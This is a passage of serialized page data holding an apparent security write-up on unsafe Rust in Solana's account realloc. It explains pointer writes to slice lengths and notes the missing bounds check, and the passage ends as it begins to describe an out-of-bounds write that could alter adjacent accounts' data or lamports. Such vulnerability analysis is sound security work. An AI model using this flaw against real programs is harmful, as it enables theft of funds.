"value":22968}," post",{"type":27,"tag":207,"props":22970,"children":22971},{"style":226},[22972],{"type":33,"value":1041},{"type":27,"tag":207,"props":22974,"children":22975},{"style":1335},[22976],{"type":33,"value":9468},{"type":27,"tag":207,"props":22978,"children":22979},{"style":238},[22980],{"type":33,"value":15018},{"type":27,"tag":207,"props":22982,"children":22983},{"class":209,"line":1475},[22984],{"type":27,"tag":207,"props":22985,"children":22986},{"style":238},[22987],{"type":33,"value":18158},{"type":27,"tag":207,"props":22989,"children":22990},{"class":209,"line":2065},[22991,22995,22999,23003,23007],{"type":27,"tag":207,"props":22992,"children":22993},{"style":376},[22994],{"type":33,"value":19556},{"type":27,"tag":207,"props":22996,"children":22997},{"style":220},[22998],{"type":33,"value":22875},{"type":27,"tag":207,"props":23000,"children":23001},{"style":226},[23002],{"type":33,"value":1041},{"type":27,"tag":207,"props":23004,"children":23005},{"style":1335},[23006],{"type":33,"value":22930},{"type":27,"tag":207,"props":23008,"children":23009},{"style":238},[23010],{"type":33,"value":23011},"() {\n",{"type":27,"tag":207,"props":23013,"children":23014},{"class":209,"line":2092},[23015,23020,23025,23029,23034,23038,23043],{"type":27,"tag":207,"props":23016,"children":23017},{"style":376},[23018],{"type":33,"value":23019}," return",{"type":27,"tag":207,"props":23021,"children":23022},{"style":8920},[23023],{"type":33,"value":23024}," Err",{"type":27,"tag":207,"props":23026,"children":23027},{"style":238},[23028],{"type":33,"value":1343},{"type":27,"tag":207,"props":23030,"children":23031},{"style":8920},[23032],{"type":33,"value":23033},"InstructionError",{"type":27,"tag":207,"props":23035,"children":23036},{"style":226},[23037],{"type":33,"value":10768},{"type":27,"tag":207,"props":23039,"children":23040},{"style":8920},[23041],{"type":33,"value":23042},"ExecutableDataModified",{"type":27,"tag":207,"props":23044,"children":23045},{"style":238},[23046],{"type":33,"value":1455},{"type":27,"tag":207,"props":23048,"children":23049},{"class":209,"line":2130},[23050,23055,23059,23064,23068],{"type":27,"tag":207,"props":23051,"children":23052},{"style":238},[23053],{"type":33,"value":23054}," } ",{"type":27,"tag":207,"props":23056,"children":23057},{"style":376},[23058],{"type":33,"value":10605},{"type":27,"tag":207,"props":23060,"children":23061},{"style":376},[23062],{"type":33,"value":23063}," if",{"type":27,"tag":207,"props":23065,"children":23066},{"style":220},[23067],{"type":33,"value":22901},{"type":27,"tag":207,"props":23069,"children":23070},{"style":238},[23071],{"type":33,"value":384},{"type":27,"tag":207,"props":23073,"children":23074},{"class":209,"line":2168},[23075,23079,23083,23087,23091,23095,23100],{"type":27,"tag":207,"props":23076,"children":23077},{"style":376},[23078],{"type":33,"value":23019},{"type":27,"tag":207,"props":23080,"children":23081},{"style":8920},[23082],{"type":33,"value":23024},{"type":27,"tag":207,"props":23084,"children":23085},{"style":238},[23086],{"type":33,"value":1343},{"type":27,"tag":207,"props":23088,"children":23089},{"style":8920},[23090],{"type":33,"value":23033},{"type":27,"tag":207,"props":23092,"children":23093},{"style":226},[23094],{"type":33,"value":10768},{"type":27,"tag":207,"props":23096,"children":23097},{"style":8920},[23098],{"type":33,"value":23099},"ExternalAccountDataModified",{"type":27,"tag":207,"props":23101,"children":23102},{"style":238},[23103],{"type":33,"value":1455},{"type":27,"tag":207,"props":23105,"children":23106},{"class":209,"line":4095},[23107,23111,23115],{"type":27,"tag":207,"props":23108,"children":23109},{"style":238},[23110],{"type":33,"value":23054},{"type":27,"tag":207,"props":23112,"children":23113},{"style":376},[23114],{"type":33,"value":10605},{"type":27,"tag":207,"props":23116,"children":23117},{"style":238},[23118],{"type":33,"value":384},{"type":27,"tag":207,"props":23120,"children":23121},{"class":209,"line":4103},[23122,23126,23130,23134,23138,23142,23147],{"type":27,"tag":207,"props":23123,"children":23124},{"style":376},[23125],{"type":33,"value":23019},{"type":27,"tag":207,"props":23127,"children":23128},{"style":8920},[23129],{"type":33,"value":23024},{"type":27,"tag":207,"props":23131,"children":23132},{"style":238},[23133],{"type":33,"value":1343},{"type":27,"tag":207,"props":23135,"children":23136},{"style":8920},[23137],{"type":33,"value":23033},{"type":27,"tag":207,"props":23139,"children":23140},{"style":226},[23141],{"type":33,"value":10768},{"type":27,"tag":207,"props":23143,"children":23144},{"style":8920},[23145],{"type":33,"value":23146},"ReadonlyDataModified",{"type":27,"tag":207,"props":23148,"children":23149},{"style":238},[23150],{"type":33,"value":1455},{"type":27,"tag":207,"props":23152,"children":23153},{"class":209,"line":4154},[23154],{"type":27,"tag":207,"props":23155,"children":23156},{"style":238},[23157],{"type":33,"value":10645},{"type":27,"tag":207,"props":23159,"children":23160},{"class":209,"line":4203},[23161],{"type":27,"tag":207,"props":23162,"children":23163},{"style":238},[23164],{"type":33,"value":451},{"type":27,"tag":58,"props":23166,"children":23168},{"id":23167},"back-to-realloc",[23169,23171],{"type":33,"value":23170},"Back to ",{"type":27,"tag":84,"props":23172,"children":23174},{"className":23173},[],[23175],{"type":33,"value":20915},{"type":27,"tag":36,"props":23177,"children":23178},{},[23179],{"type":33,"value":23180},"As a reminder, this is what we were looking at before that detour:",{"type":27,"tag":101,"props":23182,"children":23183},{"className":10270,"code":21667,"language":10269,"meta":7,"style":7},[23184],{"type":27,"tag":84,"props":23185,"children":23186},{"__ignoreMap":7},[23187,23194,23281],{"type":27,"tag":207,"props":23188,"children":23189},{"class":209,"line":210},[23190],{"type":27,"tag":207,"props":23191,"children":23192},{"style":4647},[23193],{"type":33,"value":21679},{"type":27,"tag":207,"props":23195,"children":23196},{"class":209,"line":244},[23197,23201,23205,23209,23213,23217,23221,23225,23229,23233,23237,23241,23245,23249,23253,23257,23261,23265,23269,23273,23277],{"type":27,"tag":207,"props":23198,"children":23199},{"style":214},[23200],{"type":33,"value":217},{"type":27,"tag":207,"props":23202,"children":23203},{"style":220},[23204],{"type":33,"value":21133},{"type":27,"tag":207,"props":23206,"children":23207},{"style":226},[23208],{"type":33,"value":229},{"type":27,"tag":207,"props":23210,"children":23211},{"style":214},[23212],{"type":33,"value":21073},{"type":27,"tag":207,"props":23214,"children":23215},{"style":226},[23216],{"type":33,"value":1041},{"type":27,"tag":207,"props":23218,"children":23219},{"style":1335},[23220],{"type":33,"value":21150},{"type":27,"tag":207,"props":23222,"children":23223},{"style":238},[23224],{"type":33,"value":21155},{"type":27,"tag":207,"props":23226,"children":23227},{"style":226},[23228],{"type":33,"value":10421},{"type":27,"tag":207,"props":23230,"children":23231},{"style":1335},[23232],{"type":33,"value":21164},{"type":27,"tag":207,"props":23234,"children":23235},{"style":238},[23236],{"type":33,"value":21155},{"type":27,"tag":207,"props":23238,"children":23239},{"style":226},[23240],{"type":33,"value":1041},{"type":27,"tag":207,"props":23242,"children":23243},{"style":1335},[23244],{"type":33,"value":21177},{"type":27,"tag":207,"props":23246,"children":23247},{"style":238},[23248],{"type":33,"value":1343},{"type":27,"tag":207,"props":23250,"children":23251},{"style":226},[23252],{"type":33,"value":11611},{"type":27,"tag":207,"props":23254,"children":23255},{"style":232},[23256],{"type":33,"value":3578},{"type":27,"tag":207,"props":23258,"children":23259},{"style":238},[23260],{"type":33,"value":2222},{"type":27,"tag":207,"props":23262,"children":23263},{"style":214},[23264],{"type":33,"value":16122},{"type":27,"tag":207,"props":23266,"children":23267},{"style":226},[23268],{"type":33,"value":17093},{"type":27,"tag":207,"props":23270,"children":23271},{"style":214},[23272],{"type":33,"value":11009},{"type":27,"tag":207,"props":23274,"children":23275},{"style":8920},[23276],{"type":33,"value":13142},{"type":27,"tag":207,"props":23278,"children":23279},{"style":238},[23280],{"type":33,"value":241},{"type":27,"tag":207,"props":23282,"children":23283},{"class":209,"line":270},[23284,23288,23292,23296,23300,23304,23308],{"type":27,"tag":207,"props":23285,"children":23286},{"style":226},[23287],{"type":33,"value":9286},{"type":27,"tag":207,"props":23289,"children":23290},{"style":220},[23291],{"type":33,"value":21225},{"type":27,"tag":207,"props":23293,"children":23294},{"style":226},[23295],{"type":33,"value":229},{"type":27,"tag":207,"props":23297,"children":23298},{"style":220},[23299],{"type":33,"value":21234},{"type":27,"tag":207,"props":23301,"children":23302},{"style":214},[23303],{"type":33,"value":16108},{"type":27,"tag":207,"props":23305,"children":23306},{"style":8920},[23307],{"type":33,"value":13142},{"type":27,"tag":207,"props":23309,"children":23310},{"style":238},[23311],{"type":33,"value":241},{"type":27,"tag":36,"props":23313,"children":23314},{},[23315,23320,23322,23327,23329,23334,23336,23347,23349,23354,23356,23361],{"type":27,"tag":84,"props":23316,"children":23318},{"className":23317},[],[23319],{"type":33,"value":21150},{"type":33,"value":23321}," gives us the ",{"type":27,"tag":84,"props":23323,"children":23325},{"className":23324},[],[23326],{"type":33,"value":22738},{"type":33,"value":23328}," from the ",{"type":27,"tag":84,"props":23330,"children":23332},{"className":23331},[],[23333],{"type":33,"value":22612},{"type":33,"value":23335},", whose data is inside the serialized buffer and immediately after the size of the data inside the serialized buffer. And ",{"type":27,"tag":47,"props":23337,"children":23340},{"href":23338,"rel":23339},"https://doc.rust-lang.org/std/primitive.slice.html#method.as_mut_ptr",[51],[23341],{"type":27,"tag":84,"props":23342,"children":23344},{"className":23343},[],[23345],{"type":33,"value":23346},"slice::as_mut_ptr()",{"type":33,"value":23348}," gives us that data pointer directly. So, this code computes a pointer to that serialized size field (8 bytes - the size of a ",{"type":27,"tag":84,"props":23350,"children":23352},{"className":23351},[],[23353],{"type":33,"value":15323},{"type":33,"value":23355}," - behind the data buffer), and then writes ",{"type":27,"tag":84,"props":23357,"children":23359},{"className":23358},[],[23360],{"type":33,"value":20999},{"type":33,"value":23362}," to it.",{"type":27,"tag":36,"props":23364,"children":23365},{},[23366,23368,23380,23382,23388],{"type":33,"value":23367},"This is reasonable... ",{"type":27,"tag":942,"props":23369,"children":23370},{},[23371,23373,23378],{"type":33,"value":23372},"as long as the ",{"type":27,"tag":84,"props":23374,"children":23376},{"className":23375},[],[23377],{"type":33,"value":9468},{"type":33,"value":23379}," actually came from the serialized buffer",{"type":33,"value":23381},". We'll come back to this ",{"type":27,"tag":47,"props":23383,"children":23385},{"href":23384},"#Not-contracts",[23386],{"type":33,"value":23387},"later",{"type":33,"value":1041},{"type":27,"tag":36,"props":23390,"children":23391},{},[23392,23394,23399],{"type":33,"value":23393},"At this point we've updated the serialized buffer, so at exit the runtime will understand that the size of the account's data buffer has changed. However, we haven't dealt with the Rust side yet. Slices have a length, and we haven't dealt with the ",{"type":27,"tag":84,"props":23395,"children":23397},{"className":23396},[],[23398],{"type":33,"value":22738},{"type":33,"value":23400}," slice that is our view into the data from the Rust world. So let's look at the next chunk:",{"type":27,"tag":101,"props":23402,"children":23404},{"className":10270,"code":23403,"language":10269,"meta":7,"style":7},"// Then set the new length in the local slice\nlet ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n*ptr = new_len as u64;\n",[23405],{"type":27,"tag":84,"props":23406,"children":23407},{"__ignoreMap":7},[23408,23416,23543],{"type":27,"tag":207,"props":23409,"children":23410},{"class":209,"line":210},[23411],{"type":27,"tag":207,"props":23412,"children":23413},{"style":4647},[23414],{"type":33,"value":23415},"// Then set the new length in the local slice\n",{"type":27,"tag":207,"props":23417,"children":23418},{"class":209,"line":244},[23419,23423,23427,23431,23435,23439,23443,23447,23451,23455,23459,23463,23467,23471,23475,23479,23483,23487,23491,23495,23499,23503,23507,23511,23515,23519,23523,23527,23531,23535,23539],{"type":27,"tag":207,"props":23420,"children":23421},{"style":214},[23422],{"type":33,"value":217},{"type":27,"tag":207,"props":23424,"children":23425},{"style":220},[23426],{"type":33,"value":21133},{"type":27,"tag":207,"props":23428,"children":23429},{"style":226},[23430],{"type":33,"value":229},{"type":27,"tag":207,"props":23432,"children":23433},{"style":226},[23434],{"type":33,"value":14423},{"type":27,"tag":207,"props":23436,"children":23437},{"style":214},[23438],{"type":33,"value":11009},{"type":27,"tag":207,"props":23440,"children":23441},{"style":226},[23442],{"type":33,"value":17093},{"type":27,"tag":207,"props":23444,"children":23445},{"style":238},[23446],{"type":33,"value":21293},{"type":27,"tag":207,"props":23448,"children":23449},{"style":214},[23450],{"type":33,"value":20990},{"type":27,"tag":207,"props":23452,"children":23453},{"style":226},[23454],{"type":33,"value":1041},{"type":27,"tag":207,"props":23456,"children":23457},{"style":238},[23458],{"type":33,"value":9468},{"type":27,"tag":207,"props":23460,"children":23461},{"style":226},[23462],{"type":33,"value":1041},{"type":27,"tag":207,"props":23464,"children":23465},{"style":1335},[23466],{"type":33,"value":21314},{"type":27,"tag":207,"props":23468,"children":23469},{"style":238},[23470],{"type":33,"value":21319},{"type":27,"tag":207,"props":23472,"children":23473},{"style":214},[23474],{"type":33,"value":16122},{"type":27,"tag":207,"props":23476,"children":23477},{"style":226},[23478],{"type":33,"value":17093},{"type":27,"tag":207,"props":23480,"children":23481},{"style":214},[23482],{"type":33,"value":16931},{"type":27,"tag":207,"props":23484,"children":23485},{"style":8920},[23486],{"type":33,"value":13142},{"type":27,"tag":207,"props":23488,"children":23489},{"style":238},[23490],{"type":33,"value":10416},{"type":27,"tag":207,"props":23492,"children":23493},{"style":226},[23494],{"type":33,"value":1041},{"type":27,"tag":207,"props":23496,"children":23497},{"style":1335},[23498],{"type":33,"value":21177},{"type":27,"tag":207,"props":23500,"children":23501},{"style":238},[23502],{"type":33,"value":1343},{"type":27,"tag":207,"props":23504,"children":23505},{"style":232},[23506],{"type":33,"value":1651},{"type":27,"tag":207,"props":23508,"children":23509},{"style":238},[23510],{"type":33,"value":2222},{"type":27,"tag":207,"props":23512,"children":23513},{"style":214},[23514],{"type":33,"value":16122},{"type":27,"tag":207,"props":23516,"children":23517},{"style":8920},[23518],{"type":33,"value":13142},{"type":27,"tag":207,"props":23520,"children":23521},{"style":238},[23522],{"type":33,"value":2222},{"type":27,"tag":207,"props":23524,"children":23525},{"style":214},[23526],{"type":33,"value":16122},{"type":27,"tag":207,"props":23528,"children":23529},{"style":226},[23530],{"type":33,"value":17093},{"type":27,"tag":207,"props":23532,"children":23533},{"style":214},[23534],{"type":33,"value":11009},{"type":27,"tag":207,"props":23536,"children":23537},{"style":8920},[23538],{"type":33,"value":13142},{"type":27,"tag":207,"props":23540,"children":23541},{"style":238},[23542],{"type":33,"value":1455},{"type":27,"tag":207,"props":23544,"children":23545},{"class":209,"line":270},[23546,23550,23554,23558,23562,23566,23570],{"type":27,"tag":207,"props":23547,"children":23548},{"style":226},[23549],{"type":33,"value":9286},{"type":27,"tag":207,"props":23551,"children":23552},{"style":220},[23553],{"type":33,"value":21225},{"type":27,"tag":207,"props":23555,"children":23556},{"style":226},[23557],{"type":33,"value":229},{"type":27,"tag":207,"props":23559,"children":23560},{"style":220},[23561],{"type":33,"value":21234},{"type":27,"tag":207,"props":23563,"children":23564},{"style":214},[23565],{"type":33,"value":16108},{"type":27,"tag":207,"props":23567,"children":23568},{"style":8920},[23569],{"type":33,"value":13142},{"type":27,"tag":207,"props":23571,"children":23572},{"style":238},[23573],{"type":33,"value":241},{"type":27,"tag":36,"props":23575,"children":23576},{},[23577,23579,23585,23587,23598,23600,23606,23608,23614,23616,23621,23623,23628,23630,23640,23641,23648,23649,23656,23663,23665,23671,23673,23679,23681,23686,23688,23693,23695,23701,23703,23708],{"type":33,"value":23578},"That ",{"type":27,"tag":84,"props":23580,"children":23582},{"className":23581},[],[23583],{"type":33,"value":23584},"as_ptr()",{"type":33,"value":23586}," call is ",{"type":27,"tag":47,"props":23588,"children":23591},{"href":23589,"rel":23590},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.as_ptr",[51],[23592],{"type":27,"tag":84,"props":23593,"children":23595},{"className":23594},[],[23596],{"type":33,"value":23597},"RefCell::as_ptr()",{"type":33,"value":23599}," due to the ",{"type":27,"tag":84,"props":23601,"children":23603},{"className":23602},[],[23604],{"type":33,"value":23605},"Deref",{"type":33,"value":23607}," impl on ",{"type":27,"tag":84,"props":23609,"children":23611},{"className":23610},[],[23612],{"type":33,"value":23613},"Rc",{"type":33,"value":23615}," (remember also that ",{"type":27,"tag":84,"props":23617,"children":23619},{"className":23618},[],[23620],{"type":33,"value":22779},{"type":33,"value":23622}," itself doesn't behave like a reference, you need to actually ",{"type":27,"tag":942,"props":23624,"children":23625},{},[23626],{"type":33,"value":23627},"get",{"type":33,"value":23629}," one through ",{"type":27,"tag":47,"props":23631,"children":23634},{"href":23632,"rel":23633},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow",[51],[23635],{"type":27,"tag":84,"props":23636,"children":23638},{"className":23637},[],[23639],{"type":33,"value":16082},{"type":33,"value":13740},{"type":27,"tag":47,"props":23642,"children":23645},{"href":23643,"rel":23644},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow_mut",[51],[23646],{"type":33,"value":23647},"and",{"type":33,"value":13740},{"type":27,"tag":47,"props":23650,"children":23653},{"href":23651,"rel":23652},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow",[51],[23654],{"type":33,"value":23655},"frie",{"type":27,"tag":47,"props":23657,"children":23660},{"href":23658,"rel":23659},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow_mut",[51],[23661],{"type":33,"value":23662},"nds",{"type":33,"value":23664},"). So from ",{"type":27,"tag":84,"props":23666,"children":23668},{"className":23667},[],[23669],{"type":33,"value":23670},"RefCell::\u003C&mut [u8]>::as_mut()",{"type":33,"value":23672}," we get a ",{"type":27,"tag":84,"props":23674,"children":23676},{"className":23675},[],[23677],{"type":33,"value":23678},"*mut &mut [u8]",{"type":33,"value":23680}," - a ",{"type":27,"tag":942,"props":23682,"children":23683},{},[23684],{"type":33,"value":23685},"pointer",{"type":33,"value":23687}," to the ",{"type":27,"tag":942,"props":23689,"children":23690},{},[23691],{"type":33,"value":23692},"slice reference",{"type":33,"value":23694},". From here, we turn the pointer into a ",{"type":27,"tag":84,"props":23696,"children":23698},{"className":23697},[],[23699],{"type":33,"value":23700},"*const u64",{"type":33,"value":23702}," pointer and then offset by 1 ",{"type":27,"tag":84,"props":23704,"children":23706},{"className":23705},[],[23707],{"type":33,"value":15323},{"type":33,"value":23709}," (so 8 bytes). Finally, we switch the pointer back to being mutable, and write the new length to it.",{"type":27,"tag":36,"props":23711,"children":23712},{},[23713,23715,23720,23722,23727,23729,23734,23735,23740,23742,23748],{"type":33,"value":23714},"Now, if you're sitting here thinking that this is unnecessarily convoluted and confusing, you'd be right! But we'll get back to that ",{"type":27,"tag":47,"props":23716,"children":23718},{"href":23717},"#Towards-safer-unsafe",[23719],{"type":33,"value":23387},{"type":33,"value":23721}," too, I promise. In summary, we're writing the new length as a ",{"type":27,"tag":84,"props":23723,"children":23725},{"className":23724},[],[23726],{"type":33,"value":15323},{"type":33,"value":23728}," to the region starting 8 bytes from the start of the slice ",{"type":27,"tag":942,"props":23730,"children":23731},{},[23732],{"type":33,"value":23733},"reference",{"type":33,"value":2278},{"type":27,"tag":84,"props":23736,"children":23738},{"className":23737},[],[23739],{"type":33,"value":22738},{"type":33,"value":23741},").So, what does ",{"type":27,"tag":84,"props":23743,"children":23745},{"className":23744},[],[23746],{"type":33,"value":23747},"&[T]",{"type":33,"value":23749}," look like in Rust?",{"type":27,"tag":36,"props":23751,"children":23752},{},[23753,23755,23762,23764,23777,23779,23785],{"type":33,"value":23754},"According to ",{"type":27,"tag":47,"props":23756,"children":23759},{"href":23757,"rel":23758},"https://doc.rust-lang.org/reference/type-layout.html#pointers-and-references-layout",[51],[23760],{"type":33,"value":23761},"the reference",{"type":33,"value":23763},", it's completely undefined - there are no guarantees made in the reference, and ",{"type":27,"tag":47,"props":23765,"children":23768},{"href":23766,"rel":23767},"https://doc.rust-lang.org/reference/type-layout.html",[51],[23769,23771,23775],{"type":33,"value":23770},"\"Type layout can be changed with each compilation. ",{"type":27,"tag":207,"props":23772,"children":23773},{},[23774],{"type":33,"value":16867},{"type":33,"value":23776}," we only document what is guaranteed today\"",{"type":33,"value":23778},". But it seems like those pesky language specs aren't stopping Solana developers. In current ",{"type":27,"tag":84,"props":23780,"children":23782},{"className":23781},[],[23783],{"type":33,"value":23784},"rustc",{"type":33,"value":23786},", the layout is a data pointer followed by the size; essentially the same as:",{"type":27,"tag":101,"props":23788,"children":23791},{"className":23789,"code":23790,"language":10435,"meta":7,"style":7},"language-c shiki shiki-themes slack-dark","// C language\nstruct slice_ref {\n void* ptr;\n size_t len;\n};\n",[23792],{"type":27,"tag":84,"props":23793,"children":23794},{"__ignoreMap":7},[23795,23803,23815,23832,23845],{"type":27,"tag":207,"props":23796,"children":23797},{"class":209,"line":210},[23798],{"type":27,"tag":207,"props":23799,"children":23800},{"style":4647},[23801],{"type":33,"value":23802},"// C language\n",{"type":27,"tag":207,"props":23804,"children":23805},{"class":209,"line":244},[23806,23810],{"type":27,"tag":207,"props":23807,"children":23808},{"style":214},[23809],{"type":33,"value":16677},{"type":27,"tag":207,"props":23811,"children":23812},{"style":238},[23813],{"type":33,"value":23814}," slice_ref {\n",{"type":27,"tag":207,"props":23816,"children":23817},{"class":209,"line":270},[23818,23823,23827],{"type":27,"tag":207,"props":23819,"children":23820},{"style":214},[23821],{"type":33,"value":23822}," void",{"type":27,"tag":207,"props":23824,"children":23825},{"style":226},[23826],{"type":33,"value":9286},{"type":27,"tag":207,"props":23828,"children":23829},{"style":238},[23830],{"type":33,"value":23831}," ptr;\n",{"type":27,"tag":207,"props":23833,"children":23834},{"class":209,"line":296},[23835,23840],{"type":27,"tag":207,"props":23836,"children":23837},{"style":214},[23838],{"type":33,"value":23839}," size_t",{"type":27,"tag":207,"props":23841,"children":23842},{"style":238},[23843],{"type":33,"value":23844}," len;\n",{"type":27,"tag":207,"props":23846,"children":23847},{"class":209,"line":445},[23848],{"type":27,"tag":207,"props":23849,"children":23850},{"style":238},[23851],{"type":33,"value":23852},"};\n",{"type":27,"tag":36,"props":23854,"children":23855},{},[23856],{"type":33,"value":23857},"So at the end of the day we find out that the code is simply writing over the length field in the slice reference. Let's step back a moment and take a look at all the assumptions we made along the way while executing these 2 lines (really only one of importance!):",{"type":27,"tag":12719,"props":23859,"children":23860},{},[23861,23866,23884],{"type":27,"tag":1232,"props":23862,"children":23863},{},[23864],{"type":33,"value":23865},"Slices are laid out in the precise manner described",{"type":27,"tag":1232,"props":23867,"children":23868},{},[23869,23871,23877,23879],{"type":33,"value":23870},"Pointers and ",{"type":27,"tag":84,"props":23872,"children":23874},{"className":23873},[],[23875],{"type":33,"value":23876},"usize",{"type":33,"value":23878}," are the same width as ",{"type":27,"tag":84,"props":23880,"children":23882},{"className":23881},[],[23883],{"type":33,"value":15323},{"type":27,"tag":1232,"props":23885,"children":23886},{},[23887,23889,23894],{"type":33,"value":23888},"The ",{"type":27,"tag":84,"props":23890,"children":23892},{"className":23891},[],[23893],{"type":33,"value":22779},{"type":33,"value":23895}," was not borrowed (i.e. we didn't just mutate it while someone else has a reference to its contents)",{"type":27,"tag":36,"props":23897,"children":23898},{},[23899,23901,23906,23908,23914,23916,23921,23923,23929,23931,23936,23938,23948],{"type":33,"value":23900},"Assumption #2 is ",{"type":27,"tag":942,"props":23902,"children":23903},{},[23904],{"type":33,"value":23905},"probably",{"type":33,"value":23907}," fine when we only care about targeting Solana's bytecode machine, but still not a particularly safe assumption to make in case some change happens on the toolchain. And assumption #3 turns out to be a non-issue since we had just done a ",{"type":27,"tag":84,"props":23909,"children":23911},{"className":23910},[],[23912],{"type":33,"value":23913},"borrow_mut",{"type":33,"value":23915}," of the ",{"type":27,"tag":84,"props":23917,"children":23919},{"className":23918},[],[23920],{"type":33,"value":22779},{"type":33,"value":23922}," (through ",{"type":27,"tag":84,"props":23924,"children":23926},{"className":23925},[],[23927],{"type":33,"value":23928},"AccountInfo::try_borrow_mut_data()",{"type":33,"value":23930},"), and ",{"type":27,"tag":84,"props":23932,"children":23934},{"className":23933},[],[23935],{"type":33,"value":22779},{"type":33,"value":23937}," is not usable between multiple threads",{"type":27,"tag":22749,"props":23939,"children":23940},{},[23941],{"type":27,"tag":47,"props":23942,"children":23946},{"href":23943,"ariaDescribedBy":23944,"dataFootnoteRef":7,"id":23945},"#user-content-fn-sendsync",[22756],"user-content-fnref-sendsync",[23947],{"type":33,"value":1744},{"type":33,"value":23949},", so we already have exclusive access.",{"type":27,"tag":36,"props":23951,"children":23952},{},[23953,23955,23959],{"type":33,"value":23954},"A few more ",{"type":27,"tag":942,"props":23956,"children":23957},{},[23958],{"type":33,"value":14389},{"type":33,"value":23960}," things of note, that could have gone badly but didn't:",{"type":27,"tag":1228,"props":23962,"children":23963},{},[23964,24006],{"type":27,"tag":1232,"props":23965,"children":23966},{},[23967,23969,23975,23977,23982,23984,23989,23991,23996,23998,24004],{"type":33,"value":23968},"By reborrowing the pointer (the ",{"type":27,"tag":84,"props":23970,"children":23972},{"className":23971},[],[23973],{"type":33,"value":23974},"&mut *(\u003Cvalue of type *mut u64>)",{"type":33,"value":23976},"), we've created a reference with an ",{"type":27,"tag":942,"props":23978,"children":23979},{},[23980],{"type":33,"value":23981},"unbounded lifetime",{"type":33,"value":23983},". Rust is free to infer ",{"type":27,"tag":942,"props":23985,"children":23986},{},[23987],{"type":33,"value":23988},"any",{"type":33,"value":23990}," lifetime for ",{"type":27,"tag":84,"props":23992,"children":23994},{"className":23993},[],[23995],{"type":33,"value":21225},{"type":33,"value":23997}," (including ",{"type":27,"tag":84,"props":23999,"children":24001},{"className":24000},[],[24002],{"type":33,"value":24003},"'static",{"type":33,"value":24005},"); thankfully it's only used in the next statement and never has a chance to escape.",{"type":27,"tag":1232,"props":24007,"children":24008},{},[24009,24011,24017,24019,24024,24026,24031,24033,24038,24040,24045,24047,24052,24054,24059,24061,24067,24069,24074,24076,24081,24083,24088,24090,24095,24097,24102],{"type":33,"value":24010},"Going back to the first statement when we were modifying the data buffer, it turns out we have another lifetime problem: we created a mutable pointer to the data from the ",{"type":27,"tag":84,"props":24012,"children":24014},{"className":24013},[],[24015],{"type":33,"value":24016},"RefMut",{"type":33,"value":24018}," returned from ",{"type":27,"tag":84,"props":24020,"children":24022},{"className":24021},[],[24023],{"type":33,"value":21150},{"type":33,"value":24025},", but the ",{"type":27,"tag":84,"props":24027,"children":24029},{"className":24028},[],[24030],{"type":33,"value":24016},{"type":33,"value":24032}," is dropped at the end of the statement. So, we now have in ",{"type":27,"tag":84,"props":24034,"children":24036},{"className":24035},[],[24037],{"type":33,"value":21225},{"type":33,"value":24039}," a ",{"type":27,"tag":942,"props":24041,"children":24042},{},[24043],{"type":33,"value":24044},"mutable",{"type":33,"value":24046}," pointer to the ",{"type":27,"tag":84,"props":24048,"children":24050},{"className":24049},[],[24051],{"type":33,"value":22779},{"type":33,"value":24053},"'s data, but the ",{"type":27,"tag":84,"props":24055,"children":24057},{"className":24056},[],[24058],{"type":33,"value":22779},{"type":33,"value":24060}," thinks that we're done with our borrow. If we happened to be in a multithreaded scenario with something like a ",{"type":27,"tag":84,"props":24062,"children":24064},{"className":24063},[],[24065],{"type":33,"value":24066},"Mutex",{"type":33,"value":24068}," instead of a ",{"type":27,"tag":84,"props":24070,"children":24072},{"className":24071},[],[24073],{"type":33,"value":22779},{"type":33,"value":24075}," (but with otherwise semantically identical code), then a different thread could attempt to borrow between creating ",{"type":27,"tag":84,"props":24077,"children":24079},{"className":24078},[],[24080],{"type":33,"value":21225},{"type":33,"value":24082}," and writing to it ",{"type":27,"tag":942,"props":24084,"children":24085},{},[24086],{"type":33,"value":24087},"and succeed",{"type":33,"value":24089},", resulting in us writing while another reference is alive. However, since ",{"type":27,"tag":84,"props":24091,"children":24093},{"className":24092},[],[24094],{"type":33,"value":21225},{"type":33,"value":24096}," is behind the actual data and thus the region it points to is inaccessible through the ",{"type":27,"tag":84,"props":24098,"children":24100},{"className":24099},[],[24101],{"type":33,"value":9468},{"type":33,"value":24103}," slice, this is still not a problem. I just wanted to highlight how easy it is to mess up borrowing and lifetimes when writing unsafe code.",{"type":27,"tag":36,"props":24105,"children":24106},{},[24107,24109,24114],{"type":33,"value":24108},"Ok, now that we've understood what the code is ",{"type":27,"tag":942,"props":24110,"children":24111},{},[24112],{"type":33,"value":24113},"trying",{"type":33,"value":24115}," to do, let's try to break it, shall we?",{"type":27,"tag":28,"props":24117,"children":24119},{"id":24118},"what-can-go-wrong",[24120],{"type":33,"value":24121},"What can go wrong?",{"type":27,"tag":58,"props":24123,"children":24125},{"id":24124},"contracts",[24126],{"type":33,"value":24127},"Contracts",{"type":27,"tag":36,"props":24129,"children":24130},{},[24131,24133,24138,24140,24145,24147,24152,24154,24159],{"type":33,"value":24132},"Again, it's quite conspicuous that there's no bounds check whatsoever, and additionally, we notice that at no point did we actually touch the data pointer of the slice reference when ",{"type":27,"tag":84,"props":24134,"children":24136},{"className":24135},[],[24137],{"type":33,"value":20915},{"type":33,"value":24139},"'ing. In other words, when we realloc, all we do is change some size fields, no allocation is happening. So, if we ",{"type":27,"tag":84,"props":24141,"children":24143},{"className":24142},[],[24144],{"type":33,"value":20915},{"type":33,"value":24146}," to some large size, past the end of the buffer of roughly ",{"type":27,"tag":84,"props":24148,"children":24150},{"className":24149},[],[24151],{"type":33,"value":22568},{"type":33,"value":24153}," bytes in the serialized buffer from the BPF loader, then we've got free out-of-bounds memory write! Using the ",{"type":27,"tag":84,"props":24155,"children":24157},{"className":24156},[],[24158],{"type":33,"value":9468},{"type":33,"value":24160}," slice, we can write to anything \"after\" our account's data in memory. Other accounts' data are stored adjacent in memory, so it'd be pretty easy to modify the data or lamports. And remember, sizes and indices are unsigned, so what's \"behind\" our account in memory is actually just very far \"after\" our account - the address will wrap around the end of the address space.",{"type":27,"tag":36,"props":24162,"children":24163},{},[24164,24166,24173],{"type":33,"value":24165},"There is 